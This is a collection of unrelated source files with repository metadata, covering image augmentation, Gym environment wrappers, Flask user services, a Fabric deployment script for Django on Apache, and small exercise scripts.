return render(self.request, self.template_name, context)
| [
"[email protected]"
] | |
df7db5f6cf855b9e25fa5feb01494b88573aacf4 | c5458f2d53d02cb2967434122183ed064e1929f9 | /sdks/python/test/test_contains_asset_predicate.py | 4fe42254ff5b1cf16affd36b2f5c261675e7f2ab | [] | no_license | ross-weir/ergo-node-api-sdks | fd7a32f79784dbd336ef6ddb9702b9dd9a964e75 | 9935ef703b14760854b24045c1307602b282c4fb | refs/heads/main | 2023-08-24T05:12:30.761145 | 2021-11-08T10:28:10 | 2021-11-08T10:28:10 | 425,785,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,131 | py | """
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.contains_asset_predicate_all_of import ContainsAssetPredicateAllOf
from openapi_client.model.scanning_predicate import ScanningPredicate
globals()['ContainsAssetPredicateAllOf'] = ContainsAssetPredicateAllOf
globals()['ScanningPredicate'] = ScanningPredicate
from openapi_client.model.contains_asset_predicate import ContainsAssetPredicate
class TestContainsAssetPredicate(unittest.TestCase):
"""ContainsAssetPredicate unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testContainsAssetPredicate(self):
"""Test ContainsAssetPredicate"""
# FIXME: construct object with mandatory attributes with example values
# model = ContainsAssetPredicate() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0c77dbbd8fb08d26e300e02084f0f0fbd2f1fcfe | 80c3546d525a05a31d30cc318a44e053efaeb1f1 | /tensorpack/dataflow/imgaug/misc.py | 7fc983d4c9de61f53efc05459cca5493fcaca5a5 | [
"Apache-2.0"
] | permissive | yaroslavvb/tensorpack | 0f326bef95699f84376465609b631981dc5b68bf | 271ffad1816132c57baebe8a1aa95479e79f4ef9 | refs/heads/master | 2021-05-03T11:02:22.170689 | 2018-02-06T08:18:48 | 2018-02-06T08:18:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,419 | py | # -*- coding: UTF-8 -*-
# File: misc.py
import numpy as np
import cv2
from .base import ImageAugmentor
from ...utils import logger
from ...utils.argtools import shape2d
from .transform import ResizeTransform, TransformAugmentorBase
__all__ = ['Flip', 'Resize', 'RandomResize', 'ResizeShortestEdge', 'Transpose']
class Flip(ImageAugmentor):
"""
Random flip the image either horizontally or vertically.
"""
def __init__(self, horiz=False, vert=False, prob=0.5):
"""
Args:
horiz (bool): use horizontal flip.
vert (bool): use vertical flip.
prob (float): probability of flip.
"""
super(Flip, self).__init__()
if horiz and vert:
raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
elif horiz:
self.code = 1
elif vert:
self.code = 0
else:
raise ValueError("At least one of horiz or vert has to be True!")
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
do = self._rand_range() < self.prob
return (do, h, w)
def _augment(self, img, param):
do, _, _ = param
if do:
ret = cv2.flip(img, self.code)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
else:
ret = img
return ret
def _augment_coords(self, coords, param):
do, h, w = param
if do:
if self.code == 0:
coords[:, 1] = h - coords[:, 1]
elif self.code == 1:
coords[:, 0] = w - coords[:, 0]
return coords
class Resize(TransformAugmentorBase):
""" Resize image to a target size"""
def __init__(self, shape, interp=cv2.INTER_LINEAR):
"""
Args:
shape: (h, w) tuple or a int
interp: cv2 interpolation method
"""
shape = tuple(shape2d(shape))
self._init(locals())
def _get_augment_params(self, img):
return ResizeTransform(
img.shape[0], img.shape[1],
self.shape[0], self.shape[1], self.interp)
class ResizeShortestEdge(TransformAugmentorBase):
"""
Resize the shortest edge to a certain number while
keeping the aspect ratio.
"""
def __init__(self, size, interp=cv2.INTER_LINEAR):
"""
Args:
size (int): the size to resize the shortest edge to.
"""
size = int(size)
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
scale = self.size * 1.0 / min(h, w)
if h < w:
newh, neww = self.size, int(scale * w + 0.5)
else:
newh, neww = int(scale * h + 0.5), self.size
return ResizeTransform(
h, w, newh, neww, self.interp)
class RandomResize(TransformAugmentorBase):
""" Randomly rescale width and height of the image."""
def __init__(self, xrange, yrange, minimum=(0, 0), aspect_ratio_thres=0.15,
interp=cv2.INTER_LINEAR):
"""
Args:
xrange (tuple): a (min, max) tuple. If is floating point, the
tuple defines the range of scaling ratio of new width, e.g. (0.9, 1.2).
If is integer, the tuple defines the range of new width in pixels, e.g. (200, 350).
yrange (tuple): similar to xrange, but for height.
minimum (tuple): (xmin, ymin) in pixels. To avoid scaling down too much.
aspect_ratio_thres (float): discard samples which change aspect ratio
larger than this threshold. Set to 0 to keep aspect ratio.
interp: cv2 interpolation method
"""
super(RandomResize, self).__init__()
assert aspect_ratio_thres >= 0
self._init(locals())
def is_float(tp):
return isinstance(tp[0], float) or isinstance(tp[1], float)
assert is_float(xrange) == is_float(yrange), "xrange and yrange has different type!"
self._is_scale = is_float(xrange)
if self._is_scale and aspect_ratio_thres == 0:
assert xrange == yrange
def _get_augment_params(self, img):
cnt = 0
h, w = img.shape[:2]
def get_dest_size():
if self._is_scale:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx
else:
sy = self._rand_range(*self.yrange)
destX = max(sx * w, self.minimum[0])
destY = max(sy * h, self.minimum[1])
else:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx * 1.0 / w * h
else:
sy = self._rand_range(*self.yrange)
destX = max(sx, self.minimum[0])
destY = max(sy, self.minimum[1])
return (int(destX + 0.5), int(destY + 0.5))
while True:
destX, destY = get_dest_size()
if self.aspect_ratio_thres > 0: # don't check when thres == 0
oldr = w * 1.0 / h
newr = destX * 1.0 / destY
diff = abs(newr - oldr) / oldr
if diff >= self.aspect_ratio_thres + 1e-5:
cnt += 1
if cnt > 50:
logger.warn("RandomResize failed to augment an image")
return ResizeTransform(h, w, h, w, self.interp)
continue
return ResizeTransform(h, w, destY, destX, self.interp)
class Transpose(ImageAugmentor):
"""
Random transpose the image
"""
def __init__(self, prob=0.5):
"""
Args:
prob (float): probability of transpose.
"""
super(Transpose, self).__init__()
self.prob = prob
self._init()
def _get_augment_params(self, img):
return self._rand_range() < self.prob
def _augment(self, img, do):
ret = img
if do:
ret = cv2.transpose(img)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
return ret
def _augment_coords(self, coords, do):
if do:
coords = coords[:, ::-1]
return coords
| [
"[email protected]"
] | |
92572d40e11aaec728a9177ec310fa9eb822e9f5 | b6f4e527154b82f4e3fa48f06ca53fc15bf08283 | /Day02/circle.py | 020bf65e82244b1110af1fb98f7a1eaca88e783e | [] | no_license | Light-City/Python-100-Days | 74118e36c658db6c897f847e7e554311af036b9d | 1fe049a1fe1e64082752d2d32cb75c1a4349cded | refs/heads/master | 2020-03-18T12:44:53.191512 | 2018-05-24T09:49:22 | 2018-05-24T09:49:22 | 134,741,794 | 3 | 1 | null | 2018-05-24T16:29:02 | 2018-05-24T16:29:02 | null | UTF-8 | Python | false | false | 288 | py | """
输入半径计算圆的周长和面积
Version: 0.1
Author: 骆昊
Date: 2018-02-27
"""
import math
radius = float(input('请输入圆的半径: '))
perimeter = 2 * math.pi * radius
area = math.pi * radius * radius
print('周长: %.2f' % perimeter)
print('面积: %.2f' % area)
| [
"[email protected]"
] | |
6df0e64800da4c8a788cf625ac191169d6db205a | 5c4852f02b20c5c400c58ff61702a4f35358d78c | /editor_orig.py | 6a4e667273bf50ee0537555a81df701903e3eec4 | [] | no_license | anovacap/daily_coding_problem | 6e11f338ad8afc99a702baa6d75ede0c15f02853 | e64a0e76555addbe3a31fd0ca0bb81e2715766d2 | refs/heads/master | 2023-02-23T11:04:30.041455 | 2021-01-29T18:10:36 | 2021-01-29T18:10:36 | 302,237,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,992 | py | class SimpleEditor:
def __init__(self, document):
self.document = document
self.dictionary = set()
# On windows, the dictionary can often be found at:
# C:/Users/{username}/AppData/Roaming/Microsoft/Spelling/en-US/default.dic
with open("/usr/share/dict/words") as input_dictionary:
for line in input_dictionary:
words = line.strip().split(" ")
for word in words:
self.dictionary.add(word)
self.paste_text = ""
def cut(self, i, j):
self.paste_text = self.document[i:j]
self.document = self.document[:i] + self.document[j:]
def copy(self, i, j):
self.paste_text = self.document[i:j]
def paste(self, i):
self.document = self.document[:i] + self.paste_text + self.document[i:]
def get_text(self):
return self.document
def misspellings(self):
result = 0
for word in self.document.split(" "):
if word not in self.dictionary:
result = result + 1
return result
import timeit
class EditorBenchmarker:
new_editor_case = """
from __main__ import SimpleEditor
s = SimpleEditor("{}")"""
editor_cut_paste = """
for n in range({}):
if n%2 == 0:
s.cut(1, 3)
else:
s.paste(2)"""
editor_copy_paste = """
for n in range({}):
if n%2 == 0:
s.copy(1, 3)
else:
s.paste(2)"""
editor_get_text = """
for n in range({}):
s.get_text()"""
editor_mispellings = """
for n in range({}):
s.misspellings()"""
def __init__(self, cases, N):
self.cases = cases
self.N = N
self.editor_cut_paste = self.editor_cut_paste.format(N)
self.editor_copy_paste = self.editor_copy_paste.format(N)
self.editor_get_text = self.editor_get_text.format(N)
self.editor_mispellings = self.editor_mispellings.format(N)
def benchmark(self):
for case in self.cases:
print("Evaluating case: {}".format(case))
new_editor = self.new_editor_case.format(case)
cut_paste_time = timeit.repeat(stmt=self.editor_cut_paste,setup=new_editor,repeat=3,number=1)
print("{} cut paste operations took {} s".format(self.N, cut_paste_time))
copy_paste_time = timeit.repeat(stmt=self.editor_copy_paste,setup=new_editor,repeat=3,number=1)
print("{} copy paste operations took {} s".format(self.N, copy_paste_time))
get_text_time = timeit.repeat(stmt=self.editor_get_text,setup=new_editor,repeat=3,number=1)
print("{} text retrieval operations took {} s".format(self.N, get_text_time))
mispellings_time = timeit.repeat(stmt=self.editor_mispellings,setup=new_editor,repeat=3,number=1)
print("{} mispelling operations took {} s".format(self.N, mispellings_time))
if __name__ == "__main__":
b = EditorBenchmarker(["hello friends"], 20)
b.benchmark()
| [
"[email protected]"
] | |
6b5be029fd1626d37c9b7f3db3aa07efd58e1011 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_123/627.py | 28c02feb9a393af2190da5d1cd6130c71872869c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,171 | py | __author__ = 'jeff'
from collections import deque
base = "A-small-attempt2"
#base = "A1_test"
f = open(base+'.in','r')
fout = open(base+'.out','w')
t = int(f.readline())
def proc( a, motes):
while( len( motes ) and motes[0] < a ):
a += motes.popleft()
return a
max_lev = 100000
for case in range(1,t+1):
[a,n] = f.readline().split(' ')
a=int(a)
n=int(n)
motes = list(map( int, f.readline()[0:-1].split(' ')))
motes.sort()
print(a,motes)
motes = deque( motes )
moves = 0
adds = removes = 0
lev_count = 0
while( len( motes) ):
a=proc(a,motes)
if( not len( motes ) ):
break
a_copy = a
these_adds = 0
while( a>1 and a_copy <= motes[0] ):
these_adds += 1
a_copy += (a_copy - 1)
if( these_adds > 0 and these_adds < len( motes )):
adds += these_adds
a = a_copy
else:
removes += len( motes )
motes = deque([])
moves = moves + adds + removes
out_s = 'Case #{0}: {1}\n'.format(case,moves)
print( out_s )
fout.write(out_s)
f.close()
fout.close()
| [
"[email protected]"
] | |
459e8127e4b5cb873a598644dc79c3d2708b3db1 | a9c0a8d815b6453aca945849f3b402f75684bfcb | /project/api/services.py | 95d316eb964a262ab8aa954303e31d09a23b1d26 | [] | no_license | harrywang/my-flask-tdd-docker | 4035b666a3366cd059a3a65c68c7c9ad9b637da3 | 362c33e7caa3bf35a62cff71f3c567c5e8de1fd2 | refs/heads/master | 2022-04-13T23:12:04.725775 | 2020-03-21T18:14:00 | 2020-03-21T18:14:00 | 248,801,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | # project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
return User.query.all()
def get_user_by_id(user_id):
return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
return User.query.filter_by(email=email).first()
def add_user(username, email):
user = User(username=username, email=email)
db.session.add(user)
db.session.commit()
return user
def update_user(user, username, email):
user.username = username
user.email = email
db.session.commit()
return user
def delete_user(user):
db.session.delete(user)
db.session.commit()
return user
| [
"[email protected]"
] | |
5a60d55d408bfb0329da3b0de1b835b729d6aea1 | be81eadfe934f3bc12a214e833e375520679b4ca | /src/lib/envs/envGym.py | 254f455d9a821bd035c15718f4e986c5a5aba1d2 | [
"MIT"
] | permissive | sankhaMukherjee/RLalgos | 2bbbabef68ad3bba2d21bc5e5c537db39dbca967 | 80d19a39af29947db2fc73b0443b9c3bb66d6fc0 | refs/heads/master | 2022-12-11T14:44:53.946306 | 2019-06-05T10:10:38 | 2019-06-05T10:10:38 | 164,218,142 | 0 | 0 | MIT | 2022-12-08T04:50:46 | 2019-01-05T13:38:03 | Jupyter Notebook | UTF-8 | Python | false | false | 15,876 | py | import gym, sys
import numpy as np
from collections import deque
import itertools as it
class Env:
'''A convinience function for generating episodes and memories
This convinience class generates a context manager that can be
used for generating a Gym environment. This is supposed to be a
drop-in replacement for the Unity environment. This however
differs from the Unity environment in that it needs the name of
the environment as input. The other difference is that there is
no such thing as `trainMode`.
'''
def __init__(self, envName, showEnv=False):
'''Initialize the environment
This sets up the requirements that will later be used for generating
the gym Environment. The gym environment can be used in a mode that
hides the plotting of the actuual environment. This may result in a
significant boost in speed.
Arguments:
envName {str} -- The name of the environment to be generated. This
shoould be a valid name. In case the namme provided is not a
valid name, this is going to exis with an error.
Keyword Arguments:
showEnv {bool} -- Set this to ``True`` if you want to view the
environment (default: {False})
'''
try:
self.no_graphics = not showEnv
self.envName = envName
self.states = None
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.__init__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return
def __enter__(self):
'''generate a context manager
This will actually generate the context manager and allow you use this
within a ``with`` statement. This is the function that actually
initialized the environment and maintains it, until it is needed.
The idea of multiplel agents within the gym enviroonments doesnt exists
as it does in the Unity agents. However, we shall incoroporoate this idea
within the gym environment so that a signgle action can takke place.
Returns:
``this`` -- Returns an instance of the same class
'''
try:
self.env = gym.make(self.envName)
self.state = self.env.reset()
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.__enter__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self
def reset(self):
'''reset the environment before starting an episode
Returns:
status -- The current status after the reset
'''
try:
self.state = self.env.reset()
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.reset - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self.states
def step(self, policy):
'''advance one step by taking an action
This function takes a policy function and generates an action
according to that particular policy. This results in the
advancement of the episode into a one step with the return
of the reward, and the next state along with any done
information.
Arguments:
policy {function} -- This function takes a state vector and
returns an action vector. It is assumed that the policy
is the correct type of policy, and is capable if taking
the right returning the right type of vector corresponding
the the policy for the current environment. It does not
check for the validity of the policy function
Returns:
list -- This returns a list of tuples containing the tuple
``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each
agent. Even for the case of a single agent, this is going
to return a list of states
'''
try:
results = []
states = np.array([self.state])
action = policy(states)[0].cpu().detach().numpy()
#print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space)
if type(self.env.env.action_space.sample()) == int:
action = int(action[0])
nextState, reward, done, info = self.env.step(action)
results.append((self.state, action, reward, nextState, done))
self.state = nextState
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.step - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return results
def episode(self, policy, maxSteps=None):
'''generate data for an entire episode
This function generates an entire episde. It plays the environment
by first resetting it too the beginning, and then playing the game for
a given number of steps (or unless the game is terminated). It generates
a set of list of tuplees, again one for each agent. Rememebr that even
when the number of agents is 1, it will still return a list oof states.
Arguments:
policy {function} -- The function that takes the current state and
returns the action vector.
Keyword Arguments:
maxSteps {int or None} -- The maximum number of steps that the agent is
going to play the episode before the episode is terminated. (default:
{None} in which case the episode will continue until it actually
finishes)
Returns:
list -- This returns the list of tuples for the entire episode. Again, this
is a lsit of lists, one for each agent.
'''
try:
self.reset()
stepCount = 0
allResults = [[] for _ in range(1)] # One for each agent.
while True:
stepCount += 1
result = self.step(policy)[0]
if not self.no_graphics:
self.env.render()
state, action, reward, next_state, done = result
allResults[0].append(result)
if done:
break
if (maxSteps is not None) and (stepCount >= maxSteps):
break
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.episode - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return allResults
def __exit__(self, exc, value, traceback):
'''Exit the context manager
The exit funciton that will result in exiting the
context manager. Typically one is supposed to check
the error if any at this point. This will be handled
at a higher level
Arguments:
*args {[type]} -- [description]
'''
if not exec:
self.env.close()
return True
class Env1D:
'''A convinience function for generating episodes and memories
This convinience class generates a context manager that can be
used for generating a Gym environment. This is supposed to be a
drop-in replacement for the Unity environment. This however
differs from the Unity environment in that it needs the name of
the environment as input. The other difference is that there is
no such thing as `trainMode`.
This 1D environment is designed to takke 1D state vector and use
this vector in its calculations. If you are using a 1D environment
you are advised to use this.
This environment has the added advantage that it will automatically
stack together ``N`` previous states into a single state. Note that
the first state will be copied ``N`` times, rather than zero padding
as this seems a more natural state for the beginning.
'''
def __init__(self, envName, N=1, showEnv=False):
'''Initialize the environment
This sets up the requirements that will later be used for generating
the gym Environment. The gym environment can be used in a mode that
hides the plotting of the actuual environment. This may result in a
significant boost in speed.
Arguments:
envName {str} -- The name of the environment to be generated. This
shoould be a valid name. In case the namme provided is not a
valid name, this is going to exis with an error.
Keyword Arguments:
N {integer} -- Set this to the number of states that you wish to
have that will be concatenated together. (default: 1). You will not
be able to set a value less than 1.
showEnv {bool} -- Set this to ``True`` if you want to view the
environment (default: {False})
'''
try:
self.N = N
self.no_graphics = not showEnv
self.envName = envName
self.states = None
assert type(self.N) == int, f'integer expected. Received {type(self.N)}'
assert self.N > 0, f'self.N = {self.N} (should be greater than 0)'
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.__init__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return
def __enter__(self):
'''generate a context manager
This will actually generate the context manager and allow you use this
within a ``with`` statement. This is the function that actually
initialized the environment and maintains it, until it is needed.
The idea of multiplel agents within the gym enviroonments doesnt exists
as it does in the Unity agents. However, we shall incoroporoate this idea
within the gym environment so that a signgle action can takke place.
Returns:
``this`` -- Returns an instance of the same class
'''
try:
self.env = gym.make(self.envName)
state = self.env.reset()
self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1)
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.__enter__ - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self
def reset(self):
'''reset the environment before starting an episode
Returns:
status -- The current status after the reset
'''
try:
state = self.env.reset()
self.state = deque([state for i in range(self.N+1)], maxlen=self.N+1)
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.reset - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return self.states
def step(self, policy):
'''advance one step by taking an action
This function takes a policy function and generates an action
according to that particular policy. This results in the
advancement of the episode into a one step with the return
of the reward, and the next state along with any done
information.
Arguments:
policy {function} -- This function takes a state vector and
returns an action vector. It is assumed that the policy
is the correct type of policy, and is capable if taking
the right returning the right type of vector corresponding
the the policy for the current environment. It does not
check for the validity of the policy function
Returns:
list -- This returns a list of tuples containing the tuple
``(s_t, a_t, r_{t+1}, s_{t+1}, d)``. One tuple for each
agent. Even for the case of a single agent, this is going
to return a list of states
'''
try:
results = []
state = np.array(list(it.islice(self.state, 1, 1+self.N)))
state = state.flatten()
states = np.array([state])
action = policy(states)[0].cpu().detach().numpy()
#print('A'*30, action, self.env.env.action_space.sample(), self.env.env.action_space)
if type(self.env.env.action_space.sample()) == int:
action = int(action[0])
nextState, reward, done, info = self.env.step(action)
self.state.append(nextState)
nextState = np.array(list(it.islice(self.state, 1, 1+self.N)))
nextState = nextState.flatten()
results.append((state, action, reward, nextState, done))
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.step - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return results
def episode(self, policy, maxSteps=None):
'''generate data for an entire episode
This function generates an entire episde. It plays the environment
by first resetting it too the beginning, and then playing the game for
a given number of steps (or unless the game is terminated). It generates
a set of list of tuplees, again one for each agent. Rememebr that even
when the number of agents is 1, it will still return a list oof states.
Arguments:
policy {function} -- The function that takes the current state and
returns the action vector.
Keyword Arguments:
maxSteps {int or None} -- The maximum number of steps that the agent is
going to play the episode before the episode is terminated. (default:
{None} in which case the episode will continue until it actually
finishes)
Returns:
list -- This returns the list of tuples for the entire episode. Again, this
is a lsit of lists, one for each agent.
'''
try:
self.reset()
stepCount = 0
allResults = [[] for _ in range(1)] # One for each agent.
while True:
stepCount += 1
result = self.step(policy)[0]
if not self.no_graphics:
self.env.render()
state, action, reward, next_state, done = result
allResults[0].append(result)
if done:
break
if (maxSteps is not None) and (stepCount >= maxSteps):
break
except Exception as e:
raise type(e)(
'lib.envs.envUnity.Env.episode - ERROR - ' + str(e)
).with_traceback(sys.exc_info()[2])
return allResults
def __exit__(self, exc, value, traceback):
'''Exit the context manager
The exit funciton that will result in exiting the
context manager. Typically one is supposed to check
the error if any at this point. This will be handled
at a higher level
Arguments:
*args {[type]} -- [description]
'''
if not exec:
self.env.close()
return True
| [
"[email protected]"
] | |
e23633a5a9b66be7ed21624a319c2ac19699c898 | 81a1c5db1f24a7daf4fe51de499e1aea81d8ea05 | /fabfile.py | 94155b79ffeb1d48061ee035c7bbca818b7c3f36 | [] | no_license | Beomi/azure-django-test | cf0d1fe323a63d9ba2672b8ebea2fc3e170980ce | a811afb62501f2fe245226f9bb94cd51bebc6866 | refs/heads/master | 2021-06-19T15:53:18.932591 | 2017-06-08T12:20:34 | 2017-06-08T12:20:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 6,241 | py | from fabric.contrib.files import append, exists, sed, put
from fabric.api import env, local, run, sudo
import random
import os
import json
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# deploy.json파일을 불러와 envs변수에 저장합니다.
with open(os.path.join(PROJECT_DIR, "deploy.json")) as f:
envs = json.loads(f.read())
# TODO: Required Fields: REPO_URL, PROJECT_NAME, REMOTE_HOST, REMOTE_PASSWORD, REMOTE_USER, REMOTE_HOST_SSH @ deploy.json
# developer: chagne this!
REPO_URL = envs['REPO_URL']
PROJECT_NAME = envs['PROJECT_NAME']
REMOTE_HOST_SSH = envs['REMOTE_HOST_SSH']
REMOTE_HOST = envs['REMOTE_HOST']
REMOTE_USER = envs['REMOTE_USER']
REMOTE_PASSWORD = envs['REMOTE_PASSWORD']
STATIC_ROOT_NAME = 'static_deploy'
STATIC_URL_NAME = 'static'
MEDIA_ROOT = 'uploads'
# TODO: Server Engineer: you should add env.user as sudo user and NOT be root
env.user = REMOTE_USER
username = env.user
# Option: env.password
env.hosts = [
REMOTE_HOST_SSH,
]
env.password = REMOTE_PASSWORD
project_folder = '/home/{}/{}'.format(env.user, PROJECT_NAME)
apt_requirements = [
'ufw',
'curl',
'git',
'python3-dev',
'python3-pip',
'build-essential',
'python3-setuptools',
'apache2',
'libapache2-mod-wsgi-py3',
'libmysqlclient-dev',
'libssl-dev',
'libxml2-dev',
'libjpeg8-dev',
'zlib1g-dev',
]
def new_server():
setup()
deploy()
def setup():
_get_latest_apt()
_install_apt_requirements(apt_requirements)
_make_virtualenv()
#_ufw_allow()
def deploy():
_get_latest_source()
_put_envs()
_update_settings()
_update_virtualenv()
_update_static_files()
_update_database()
#_ufw_allow()
_make_virtualhost()
_grant_apache2()
_grant_sqlite3()
_restart_apache2()
def _put_envs():
put(os.path.join(PROJECT_DIR, 'envs.json'), '~/{}/envs.json'.format(PROJECT_NAME))
def _get_latest_apt():
update_or_not = input('would you update?: [y/n]')
if update_or_not=='y':
sudo('sudo apt-get update && sudo apt-get -y upgrade')
def _install_apt_requirements(apt_requirements):
reqs = ''
for req in apt_requirements:
reqs += (' ' + req)
sudo('sudo apt-get -y install {}'.format(reqs))
def _make_virtualenv():
if not exists('~/.virtualenvs'):
script = '''"# python virtualenv settings
export WORKON_HOME=~/.virtualenvs
export VIRTUALENVWRAPPER_PYTHON="$(command \which python3)" # location of python3
source /usr/local/bin/virtualenvwrapper.sh"'''
run('mkdir ~/.virtualenvs')
sudo('sudo pip3 install virtualenv virtualenvwrapper')
run('echo {} >> ~/.bashrc'.format(script))
def _get_latest_source():
if exists(project_folder + '/.git'):
run('cd %s && git fetch' % (project_folder,))
else:
run('git clone %s %s' % (REPO_URL, project_folder))
current_commit = local("git log -n 1 --format=%H", capture=True)
run('cd %s && git reset --hard %s' % (project_folder, current_commit))
def _update_settings():
settings_path = project_folder + '/{}/settings.py'.format(PROJECT_NAME)
sed(settings_path, "DEBUG = True", "DEBUG = False")
sed(settings_path,
'ALLOWED_HOSTS = .+$',
'ALLOWED_HOSTS = ["%s"]' % (REMOTE_HOST,)
)
secret_key_file = project_folder + '/{}/secret_key.py'.format(PROJECT_NAME)
if not exists(secret_key_file):
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
key = ''.join(random.SystemRandom().choice(chars) for _ in range(50))
append(secret_key_file, "SECRET_KEY = '%s'" % (key,))
append(settings_path, '\nfrom .secret_key import SECRET_KEY')
def _update_virtualenv():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
if not exists(virtualenv_folder + '/bin/pip'):
run('cd /home/%s/.virtualenvs && virtualenv %s' % (env.user, PROJECT_NAME))
run('%s/bin/pip install -r %s/requirements.txt' % (
virtualenv_folder, project_folder
))
def _update_static_files():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py collectstatic --noinput' % (
project_folder, virtualenv_folder
))
def _update_database():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py migrate --noinput' % (
project_folder, virtualenv_folder
))
def _ufw_allow():
sudo("ufw allow 'Apache Full'")
sudo("ufw reload")
def _make_virtualhost():
script = """'<VirtualHost *:80>
ServerName {servername}
Alias /{static_url} /home/{username}/{project_name}/{static_root}
Alias /{media_url} /home/{username}/{project_name}/{media_url}
<Directory /home/{username}/{project_name}/{media_url}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{static_root}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{project_name}>
<Files wsgi.py>
Require all granted
</Files>
</Directory>
WSGIDaemonProcess {project_name} python-home=/home/{username}/.virtualenvs/{project_name} python-path=/home/{username}/{project_name}
WSGIProcessGroup {project_name}
WSGIScriptAlias / /home/{username}/{project_name}/{project_name}/wsgi.py
ErrorLog ${{APACHE_LOG_DIR}}/error.log
CustomLog ${{APACHE_LOG_DIR}}/access.log combined
</VirtualHost>'""".format(
static_root=STATIC_ROOT_NAME,
username=env.user,
project_name=PROJECT_NAME,
static_url=STATIC_URL_NAME,
servername=REMOTE_HOST,
media_url=MEDIA_ROOT
)
sudo('echo {} > /etc/apache2/sites-available/{}.conf'.format(script, PROJECT_NAME))
sudo('a2ensite {}.conf'.format(PROJECT_NAME))
def _grant_apache2():
sudo('sudo chown -R :www-data ~/{}'.format(PROJECT_NAME))
def _grant_sqlite3():
sudo('sudo chmod 775 ~/{}/db.sqlite3'.format(PROJECT_NAME))
def _restart_apache2():
sudo('sudo service apache2 restart') | [
"[email protected]"
] | |
5edb0c8e55ee71407031f5baea3676bd34bf5368 | 28ae42f6a83fd7c56b2bf51e59250a31e68917ca | /tracpro/polls/migrations/0015_issue_region.py | ff1c2937af89c2c8ce646673002fd58356fd1f04 | [
"BSD-3-Clause"
] | permissive | rapidpro/tracpro | 0c68443d208cb60cbb3b2077977786f7e81ce742 | a68a782a7ff9bb0ccee85368132d8847c280fea3 | refs/heads/develop | 2021-01-19T10:29:48.381533 | 2018-03-13T12:17:11 | 2018-03-13T12:17:11 | 29,589,268 | 5 | 10 | BSD-3-Clause | 2018-02-23T14:43:12 | 2015-01-21T12:51:24 | Python | UTF-8 | Python | false | false | 575 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
